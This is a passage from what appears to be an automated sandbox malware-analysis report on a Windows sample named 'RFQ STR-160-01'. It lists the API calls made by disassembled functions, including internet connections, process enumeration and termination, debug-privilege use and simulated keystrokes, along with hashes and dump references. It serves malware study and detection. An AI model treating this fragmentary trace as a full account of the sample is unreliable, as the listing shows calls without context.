              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00625186
              • ShowWindow.USER32(?,00000000), ref: 006251C7
              • ShowWindow.USER32(?,00000005,?,00000000), ref: 006251CD
              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006251D1
                • Part of subcall function 00626FBA: DeleteObject.GDI32(00000000), ref: 00626FE6
              • GetWindowLongW.USER32(?,000000F0), ref: 0062520D
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0062521A
              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0062524D
              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00625287
              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00625296
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
              • String ID:
              • API String ID: 3210457359-0
              • Opcode ID: fcbc535587be840e1cabe97f816aa737015e6fe59891751aeb0a86cccffc2fa3
              • Instruction ID: 4084ac8c8047d28d98836a0c0d958f3366ff8e515479b42c84d190f3bd9760fe
              • Opcode Fuzzy Hash: fcbc535587be840e1cabe97f816aa737015e6fe59891751aeb0a86cccffc2fa3
              • Instruction Fuzzy Hash: 40519E30A51E29FEEF309F24EC49BD83B67AB05320F148011F6169A2E0C375AAA1DF51
              APIs
              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 005E6890
              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005E68A9
              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005E68B9
              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005E68D1
              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005E68F2
              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005A8874,00000000,00000000,00000000,000000FF,00000000), ref: 005E6901
              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005E691E
              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005A8874,00000000,00000000,00000000,000000FF,00000000), ref: 005E692D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Icon$DestroyExtractImageLoadMessageSend
              • String ID:
              • API String ID: 1268354404-0
              • Opcode ID: eed6137a533d6f4509b385a131f24a0efd5f58fa9f7774ee0f3c311b0e859d2d
              • Instruction ID: 5a2f068d9e1ed0a6af01962a65fbfcd634a05250471ec70a3857bf413d2e19f4
              • Opcode Fuzzy Hash: eed6137a533d6f4509b385a131f24a0efd5f58fa9f7774ee0f3c311b0e859d2d
              • Instruction Fuzzy Hash: BC51A870600609EFDB24CF25CC55BAE3BB6FB993A0F104528F952D72A0DB70E990CB60
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060C182
              • GetLastError.KERNEL32 ref: 0060C195
              • SetEvent.KERNEL32(?), ref: 0060C1A9
                • Part of subcall function 0060C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060C272
                • Part of subcall function 0060C253: GetLastError.KERNEL32 ref: 0060C322
                • Part of subcall function 0060C253: SetEvent.KERNEL32(?), ref: 0060C336
                • Part of subcall function 0060C253: InternetCloseHandle.WININET(00000000), ref: 0060C341
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
              • String ID:
              • API String ID: 337547030-0
              • Opcode ID: 281af09ec58bb8cffeee9703ee35ada293ad3fd071963a6a2e64a779c96c0471
              • Instruction ID: 23497f1c5202d8329be67569b6d0356abcdc4b5dc2fc8ceb05c914a1797a2054
              • Opcode Fuzzy Hash: 281af09ec58bb8cffeee9703ee35ada293ad3fd071963a6a2e64a779c96c0471
              • Instruction Fuzzy Hash: 3831A171540A01FFDB299FE5DD04AABBBFAFF18320B00461DF95683A50C730E9159BA0
              APIs
                • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F25BD
              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005F25DB
              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005F25DF
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F25E9
              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005F2601
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 005F2605
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F260F
              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005F2623
              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 005F2627
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
              • String ID:
              • API String ID: 2014098862-0
              • Opcode ID: a5c8c79ec543db0acf86ff79a180e896d730fc73676d36da0eed9c0c6192b670
              • Instruction ID: 605b3e619a0742918cf674f9ffcb661bc048a4aff68a4fcb4e6b90e3cc3f3396
              • Opcode Fuzzy Hash: a5c8c79ec543db0acf86ff79a180e896d730fc73676d36da0eed9c0c6192b670
              • Instruction Fuzzy Hash: CE01D830390A14BBFB206769DC8EF693F5AEF8EB21F101001F354AE0D1C9E214459A69
              APIs
              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,005F1449,?,?,00000000), ref: 005F180C
              • HeapAlloc.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F1813
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1449,?,?,00000000), ref: 005F1828
              • GetCurrentProcess.KERNEL32(?,00000000,?,005F1449,?,?,00000000), ref: 005F1830
              • DuplicateHandle.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F1833
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1449,?,?,00000000), ref: 005F1843
              • GetCurrentProcess.KERNEL32(005F1449,00000000,?,005F1449,?,?,00000000), ref: 005F184B
              • DuplicateHandle.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F184E
              • CreateThread.KERNEL32(00000000,00000000,005F1874,00000000,00000000,00000000), ref: 005F1868
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
              • String ID:
              • API String ID: 1957940570-0
              • Opcode ID: 7385525b5f54878027fb158839642a460dbfc64f7232a5c11fef27256d8df0ec
              • Instruction ID: f321819fd9f2649c3ddee2a9981cfa2104659c4521c739a58f8e159019b65ee0
              • Opcode Fuzzy Hash: 7385525b5f54878027fb158839642a460dbfc64f7232a5c11fef27256d8df0ec
              • Instruction Fuzzy Hash: 3E01FBB5240708BFE720ABA5DC4EF6B3BADEB89B10F104410FA04DB1A1CA709811CB60
              APIs
                • Part of subcall function 005FD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 005FD501
                • Part of subcall function 005FD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 005FD50F
                • Part of subcall function 005FD4DC: CloseHandle.KERNEL32(00000000), ref: 005FD5DC
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061A16D
              • GetLastError.KERNEL32 ref: 0061A180
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061A1B3
              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0061A268
              • GetLastError.KERNEL32(00000000), ref: 0061A273
              • CloseHandle.KERNEL32(00000000), ref: 0061A2C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
              • String ID: SeDebugPrivilege
              • API String ID: 2533919879-2896544425
              • Opcode ID: b0c311e56351f8a79c8a77403bb83b18b2d4fd96bd07bdeed7de2a17bb4e3080
              • Instruction ID: 6182033c2fa9e0d21a04800780062a196fb2e2e863b4f23503bfc3036a10ba52
              • Opcode Fuzzy Hash: b0c311e56351f8a79c8a77403bb83b18b2d4fd96bd07bdeed7de2a17bb4e3080
              • Instruction Fuzzy Hash: AB61E430205242AFD720DF54C499FA9BBE2BF44318F18848CE4568B793C772ED85CB82
              APIs
              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00623925
              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0062393A
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00623954
              • _wcslen.LIBCMT ref: 00623999
              • SendMessageW.USER32(?,00001057,00000000,?), ref: 006239C6
              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006239F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$Window_wcslen
              • String ID: SysListView32
              • API String ID: 2147712094-78025650
              • Opcode ID: a05e87c0039257786a546c8b9e2aea8d5add94c2d247c772a5923bd42113fffd
              • Instruction ID: c0e07875f4ac82c3237f64c355e0575edc3202e9e0484e117948688de275309f
              • Opcode Fuzzy Hash: a05e87c0039257786a546c8b9e2aea8d5add94c2d247c772a5923bd42113fffd
              • Instruction Fuzzy Hash: BD41C571A00629ABDF219F64DC49BEE7BAAFF48350F100526F948E7381D7759984CF90
              APIs
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FBCFD
              • IsMenu.USER32(00000000), ref: 005FBD1D
              • CreatePopupMenu.USER32 ref: 005FBD53
              • GetMenuItemCount.USER32(01806438), ref: 005FBDA4
              • InsertMenuItemW.USER32(01806438,?,00000001,00000030), ref: 005FBDCC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$Item$CountCreateInfoInsertPopup
              • String ID: 0$2
              • API String ID: 93392585-3793063076
              • Opcode ID: fa530fbe83b9e3c982887783a4dc048d431b024c26ad8ff2ad9981fbc8892ca0
              • Instruction ID: 45a97b92c2ca7f36dd296f5a033ddafe0add377dd6f9f2d533dedaed0ddae0f0
              • Opcode Fuzzy Hash: fa530fbe83b9e3c982887783a4dc048d431b024c26ad8ff2ad9981fbc8892ca0
              • Instruction Fuzzy Hash: 40519E70A0020DDBEB20DFA8D888BBEBFF5BF85324F144519E651E7290D7789941CB62
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 005B2D4B
              • ___except_validate_context_record.LIBVCRUNTIME ref: 005B2D53
              • _ValidateLocalCookies.LIBCMT ref: 005B2DE1
              • __IsNonwritableInCurrentImage.LIBCMT ref: 005B2E0C
              • _ValidateLocalCookies.LIBCMT ref: 005B2E61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: &H[$csm
              • API String ID: 1170836740-2052090383
              • Opcode ID: a9c8a2450337ed074daaba1bcbdc5db1cb70a7a82d0971fe5b2656094350f424
              • Instruction ID: b278180c3e54b08345ef60cc4c7f337c5818d0df1203717c5fb1bf200e6cd395
              • Opcode Fuzzy Hash: a9c8a2450337ed074daaba1bcbdc5db1cb70a7a82d0971fe5b2656094350f424
              • Instruction Fuzzy Hash: 96417334A01209AFCF10DF68C859ADEBFB5BF45324F148555E814AB392D731BA06CBE1
              APIs
              • LoadIconW.USER32(00000000,00007F03), ref: 005FC913
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: IconLoad
              • String ID: blank$info$question$stop$warning
              • API String ID: 2457776203-404129466
              • Opcode ID: ec0dd51d70e34d19fc107ff5ec01d1482b30a6c4a750aa1834eccdf9588b16d6
              • Instruction ID: 795759a5f9fbe3442380d41b2b8e12c6f8890a69c126899f3894597727ae5768
              • Opcode Fuzzy Hash: ec0dd51d70e34d19fc107ff5ec01d1482b30a6c4a750aa1834eccdf9588b16d6
              • Instruction Fuzzy Hash: 9A115E3168930FBBE7105710DE82CFE6F9CFF15755B50003AF600A7182D7A9BE445664
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$LocalTime
              • String ID:
              • API String ID: 952045576-0
              • Opcode ID: c8beabbe6f8f591b36d7b1c12d2981ff866c23d8184333b881d0140f0255c3a1
              • Instruction ID: 55dfb20e3db80353f37c8f86aa778c5748fb4e96337261d8a3aec3a20a55dbc9
              • Opcode Fuzzy Hash: c8beabbe6f8f591b36d7b1c12d2981ff866c23d8184333b881d0140f0255c3a1
              • Instruction Fuzzy Hash: 41419269C1011966DB11EBB48C8F9DFBBACBF85310F508466E614E3122FB38E245C7A5
              APIs
              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005AF953
              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005EF3D1
              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005EF454
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ShowWindow
              • String ID:
              • API String ID: 1268545403-0
              • Opcode ID: fb878f2ed0ca24b4062b1d8e44784d0101545b6f29fab4f75de1a89c9af60631
              • Instruction ID: ec0ff481a211aa0dd16f5f1422ebb02c98f7e5db905c1ff18e6aa07c773e4fd5
              • Opcode Fuzzy Hash: fb878f2ed0ca24b4062b1d8e44784d0101545b6f29fab4f75de1a89c9af60631
              • Instruction Fuzzy Hash: 53411931608680BECB798B69D89876F7F92BF97324F14583CE08757560DA72A881CB51
              APIs
              • DeleteObject.GDI32(00000000), ref: 00622D1B
              • GetDC.USER32(00000000), ref: 00622D23
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00622D2E
              • ReleaseDC.USER32(00000000,00000000), ref: 00622D3A
              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00622D76
              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00622D87
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00625A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00622DC2
              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00622DE1
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
              • String ID:
              • API String ID: 3864802216-0
              • Opcode ID: 2aa0d0b58b4db9d01b08b3fd3afc185e08dca40f0b6c45150476e5bdda5b916e
              • Instruction ID: e96d5a7bf82b293d3cd0627072ac3a670356ffcd9b7d43793ee2a3f44ee0e353
              • Opcode Fuzzy Hash: 2aa0d0b58b4db9d01b08b3fd3afc185e08dca40f0b6c45150476e5bdda5b916e
              • Instruction Fuzzy Hash: 6B317F72201A24BFEB214F50DC8AFEB3BAAEF09725F044055FE089A291C6759C51CBA4
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 7acad05dc88f3db8f012f74e912a16201fb04ae5e1ecd0d22957cfe9cd5de256
              • Instruction ID: 607a028a1e7a07f2e1e7d6f1d22147286abc1df1d686f029fb4eed04d0c8f0bf
              • Opcode Fuzzy Hash: 7acad05dc88f3db8f012f74e912a16201fb04ae5e1ecd0d22957cfe9cd5de256
              • Instruction Fuzzy Hash: CD21F261745E1E7B925466209E92FFB2BADBF603C4F840430FF17DA681F728ED1085A9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: NULL Pointer assignment$Not an Object type
              • API String ID: 0-572801152
              • Opcode ID: aeca2ce781cc1bd5699a41b900dd97072b008a406b21a1789eb8f25307b5a40d
              • Instruction ID: 759728321e29151172ad21c04435f97e86568beb4b443ca44557996d461ea4e0
              • Opcode Fuzzy Hash: aeca2ce781cc1bd5699a41b900dd97072b008a406b21a1789eb8f25307b5a40d
              • Instruction Fuzzy Hash: 6BD19671A0060ADFDF10DF98D881BEEB7B6BF88344F188469E916AB281D770DD85CB50
              APIs
              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,005D17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 005D15CE
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005D1651
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,005D17FB,?,005D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005D16E4
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005D16FB
                • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,005D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005D1777
              • __freea.LIBCMT ref: 005D17A2
              • __freea.LIBCMT ref: 005D17AE
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
              • String ID:
              • API String ID: 2829977744-0
              • Opcode ID: da3db7abe39aff89adddfb1c54050f6ebaee585149559b947b7178bc200b3514
              • Instruction ID: db9828ec50cb8837055591062fa1bd7e225cd9da975492ba7af007580069e95a
              • Opcode Fuzzy Hash: da3db7abe39aff89adddfb1c54050f6ebaee585149559b947b7178bc200b3514
              • Instruction Fuzzy Hash: 0691C271E00A06AEDB308EA8D985AEE7FB5FF49310F18465BE806E7351D729DC40CB64
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
